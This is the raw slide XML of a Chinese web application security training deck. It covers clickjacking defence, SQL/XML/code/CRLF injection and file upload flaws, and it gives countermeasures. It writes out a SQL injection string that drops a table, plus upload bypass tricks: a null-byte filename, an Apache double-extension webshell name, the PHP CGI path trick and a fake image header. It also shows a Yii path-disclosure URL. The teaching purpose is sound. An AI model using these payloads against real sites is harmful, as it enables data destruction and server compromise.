                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>属性。这个可以通过配置 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>OWASP AntiSamy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对应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty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endParaRPr lang="zh-CN" altLang="en-US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772816"/>
            <a:ext cx="6984776" cy="17281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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF33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&lt;style id="antiClickjack"&gt;body{display:none !important;}&lt;/style&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF33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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF33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script type="text/javascript"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF33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if (self === top) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF33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   var antiClickjack = document.getElementById("antiClickjack");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF33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   antiClickjack.parentNode.removeChild(antiClickjack);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF33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} else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF33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   top.location = self.location;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF33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zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF33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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF33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494052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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>注入攻击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 smtClean="0"/>
              <a:t>原理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>通过拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>字符串达到非法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>目的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Select * from CityTable where shipCity = ‘beijing’ ;drop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>table CityTable </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>其中黑色加粗为非法拼接。正常应为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Select * from CityTable where shipCity = ‘beijing’</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>此种类型的注入包括盲注（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Blind Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,Timing Attack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>类似的操作也会后续对数据库进行注入攻击，大多是基于数据库的结构中的安全漏洞，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>mysql4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>中的用户自定义函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sqlserver2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>，数据库的字符集编码比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>GBK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>0xbf27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>0xbf5c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>都会被认为是一个字符导致字符编码错乱。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9928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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>注入攻击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xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入：用户能控制数据的输入，程序拼凑了数据 。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> anti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>：对用户输入数据中包含的语言本身的保留字符进行转义。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>代码注入：有一些不安全的函数或者方法引起。比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(),system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Anti:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>尽量避免使用不安全的函数，如果一定要使用，需要对用户的输入数据进行处理。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>中避免动态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>远程文件，或者安全的处理他。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Crlf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>cr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>carriage return(ASCII 13,\r)  lf: line feed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ASCII 10,\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\r\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>通常表示换行，作为不同语义见的分隔符。通过输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>来伪造分割比如在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>头，可以达到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>anti:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>处理好</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\r\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>两个保留字符的应用。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9928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165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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>注入攻击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/>
              <a:t>防御</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>使用预编译语句。在通用框架中都有，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ibatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>mybatis</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>数据类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>数据库自身应该使用最小权限原则，避免</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>应用直接使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>dbowner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的高权限账户直接链接数据库。多个应用使用同一个数据库，应该分配不同的账户。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>应用的数据库账户，不应该有创建自定义函数、操作本地文件的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ibatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>而言，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>#{}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>是预编译功能，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>${}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>是直接读取功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>select a.id from t where value=#{} order by ${}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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1713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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、文件上传漏洞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6.1.1   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>FCKEditor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>文件上传漏洞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详细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说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：在存在漏洞版本中，是通过检查文件的后缀来确定是否安全的，代码：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[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>AllowedExtensions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>’][‘File’] = array();//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>允许上传的类型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[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>DeniedExtensions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>’][‘File’] = array(‘php’,’php3’,’php5’,’phtml’,’asp’,’aspx’,’ascx’,’jsp’,’cfm’,’cfc’,’pl’,’bat’,’exe’,’dll’,’reg’,’cgi’);//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>禁止上传的类型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PS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：如果上传后缀为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>php2,php4,inc,pwml,asa,cer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>有可能导致安全问题发生。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>6.1.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>   绕过文件上传检查功能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详细说明：在针对上传文件的检查中，很多应用都是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通过判断文件后缀的方法来验证方法的安全性的。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" y="83765"/>
            <a:ext cx="9036050" cy="579350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xxx.php[\0].JPG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[\0]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为十六进制的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0X00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>字符，在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等语言中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>被认为是终止符，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>.JPG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>绕过了文件类型判断，但是服务器端会因</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>字符截断，最终却会变成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>xxx.php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除了检查文件后缀外，有的应用是通过判断文件的文件头来验证文件的类型。这样常见的攻击技巧就是伪造一个合法的文件头，而将真实的脚本代码附在合法的文件头之后。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>6.1.3   Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>文件解析问题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详细说明：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对于文件名的解析是从后往前解析的，直到遇见一个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认识的文件类型为止。比如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xxx.php.rar.rar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不认识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这个文件类型，所以会一直遍历后缀到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然后认为这一个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类型的文件。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>6.1.4  PHP CGI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>路径解析问题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详细说明：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>fastcgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>往前递归查询路径，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http://www.xxx.com/path/test.jpg/notexist.php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" y="83765"/>
            <a:ext cx="9036050" cy="579350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notexist.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在服务器上是不存在的，则往前查询，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>test.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是存在，把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>test.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>作为一个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文件来解析执行；出现这个漏洞的原因与环境变量配置有关，在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配置文件中有个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>cgi.fix_pathinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>选项，默认是开启的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>cgi.fix_pathinfo=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>他自动递归查询路径确认文件的合法性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>6.2.1    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>利用上传文件钓鱼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详细描述：伪造一个合法的图片文件，在图片文件中写一段脚本控制浏览器跳转到指定的网站，在此是一个钓鱼网站，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IE8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以下有如上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>问题出现，因为浏览器会把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等文件当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>来执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0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>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.2cto.com/Article/200902/31795.html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设计安全的文件上传功能（防御）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、文件上传的目录设置为不可执行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、判断文件类型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在判断文件类型时，可以结合使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>MIME Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、后缀检查等方式，在文件类型检查中，推荐使用白</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>名单方式。对图片处理可以使用压缩函数或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>resize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>函数，破坏可能包含的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>代码；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、使用随机数改写文件名和文件路径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如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>shell.php.rar.rar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这种文件都将因为文件名被改写而无法成功实施攻击；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、单独设置文件服务器的域名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由于浏览器的同源策略的关系，一系列客户端攻击将失效，比如上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>crossdomain.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、上传包含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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用等问题将得到解决。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框架安全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8.1   Struts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>详细说明：远程命令执行（演示）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>8.2   YII</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>详细说明：访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>xxx/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>index.php?r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>[][]=login/login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，绝对路径暴露</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
